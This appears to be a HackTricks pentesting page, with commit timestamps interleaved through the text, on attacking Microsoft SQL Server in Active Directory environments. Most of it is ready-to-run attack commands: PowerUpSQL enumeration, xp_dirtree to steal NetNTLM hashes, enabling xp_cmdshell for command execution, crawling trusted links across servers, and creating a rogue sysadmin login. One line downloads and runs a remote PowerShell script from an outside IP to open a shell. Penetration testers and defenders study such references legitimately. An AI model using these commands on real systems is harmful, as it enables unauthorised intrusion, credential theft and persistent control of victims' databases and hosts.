2022-08-15 13:00:19 +00:00
# MSSQL AD Abuse
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
2022-04-28 16:01:33 +00:00
< / details >
2022-08-15 13:00:19 +00:00
## **MSSQL Enumeration / Discovery**
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
The powershell module [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL ) is very useful in this case.
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
### Enumerating from the network without domain session
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
2020-07-15 15:43:14 +00:00
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP – Verbose – Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
### Enumerating from inside the domain
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
2020-07-15 15:43:14 +00:00
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
## MSSQL Basic Abuse
### Access DB
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
2020-07-15 15:43:14 +00:00
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
### MSSQL xp\_dirtree abuse
Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address** .
### Steal NetNTLM hash / Relay attack
Using ** `xp_dirtree` ** it's possible to **force** a NTLM **authentication** , therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack** .
Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash** .\
You can see how to use these tools in:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md ](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md )
{% endcontent-ref %}
### MSSQL RCE
It might be also possible to **execute commands** inside the MSSQL host
```powershell
Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
If **manually** you could just use: 
< pre class = "language-sql" > < code class = "lang-sql" > < strong > #To enumerate the current state of xp_cmdshell
< / strong > SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# A value of 0 shows that xp_cmdshell is disabled. To enable it:
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Execute
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -w hidden -enc < blah>';< / code > < / pre >
### MSSQL Extra
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %}
[pentesting-mssql-microsoft-sql-server.md ](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md )
{% endcontent-ref %}
## MSSQL Trusted Links
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance** . This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
**The links between databases work even across forest trusts.**
### Powershell Abuse
```powershell
2020-07-15 15:43:14 +00:00
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
#Crawl trusted links, starting form the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
2021-01-03 00:43:09 +00:00
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "< INSTANCE1 > " -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "< INSTANCE2 > "'
2020-07-15 15:43:14 +00:00
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv – Verbose – Instance "SQLServer1\Instance1"
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
2020-07-15 15:43:14 +00:00
```
2022-07-28 09:46:19 +00:00
### Metasploit
2020-07-15 15:43:14 +00:00
You can easily check for trusted links using metasploit.
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2021-11-30 16:46:07 +00:00
Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
2020-07-15 15:43:14 +00:00
2022-07-28 09:46:19 +00:00
### Manual - Openquery()
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.**
2020-07-15 15:43:14 +00:00
2022-09-27 00:18:19 +00:00
From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL** ](https://www.heidisql.com )
2020-07-15 15:43:14 +00:00
_Login using Windows authentication:_
2022-07-28 09:46:19 +00:00
![](< .. / . . / . gitbook / assets / image ( 167 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
#### Find Trustable Links
```sql
select * from master..sysservers
```
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . . / . gitbook / assets / image ( 168 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
#### Execute queries in trustable link
Execute queries through the link (example: find more links in the new accessible instance):
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
Check where double and single quotes are used, it's important to use them that way.
{% endhint %}
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . . / . gitbook / assets / image ( 169 ) . png > )
2020-07-15 15:43:14 +00:00
You can continue these trusted links chain forever manually.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("< computer > ", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("< computer2 > ", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method.
2020-07-15 15:43:14 +00:00
2022-07-28 09:46:19 +00:00
### Manual - EXECUTE
2020-07-15 15:43:14 +00:00
2022-08-15 13:00:19 +00:00
You can also abuse trusted links using `EXECUTE` :
2020-07-15 15:43:14 +00:00
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2022-08-15 13:00:19 +00:00
## Local Privilege Escalation
The **MSSQL local user** usually has a special type of privilege called ** `SeImpersonatePrivilege` **. This allows the account to "impersonate a client after authentication".
A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate.
[SweetPotato ](https://github.com/CCob/SweetPotato ) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
2022-04-28 16:01:33 +00:00
< / details >